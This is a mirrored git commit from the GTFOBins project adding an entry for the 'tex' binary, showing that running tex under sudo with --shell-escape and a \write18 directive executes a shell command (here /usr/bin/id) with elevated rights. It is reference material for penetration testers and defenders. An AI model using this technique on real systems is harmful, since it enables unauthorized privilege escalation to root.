mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-26 06:49:44 +01:00
Create tex.md
Add tex.
This commit is contained in:
parent
85010470b2
commit
8c08101fed
6
_gtfobins/tex.md
Normal file
6
_gtfobins/tex.md
Normal file
@ -0,0 +1,6 @@
|
|||||||
|
description: `tex` has a similar behaviour as [`pdftex`](/gtfobins/pdftex/)
|
||||||
|
functions:
|
||||||
|
sudo:
|
||||||
|
- code: |
|
||||||
|
echo "\documentclass[12pt]{article} \begin{document} \write18{/usr/bin/id} \end{document}" > file.tex
|
||||||
|
tex -interaction=nonstopmode --shell-escape file.tex
|
Loading…
Reference in New Issue
Block a user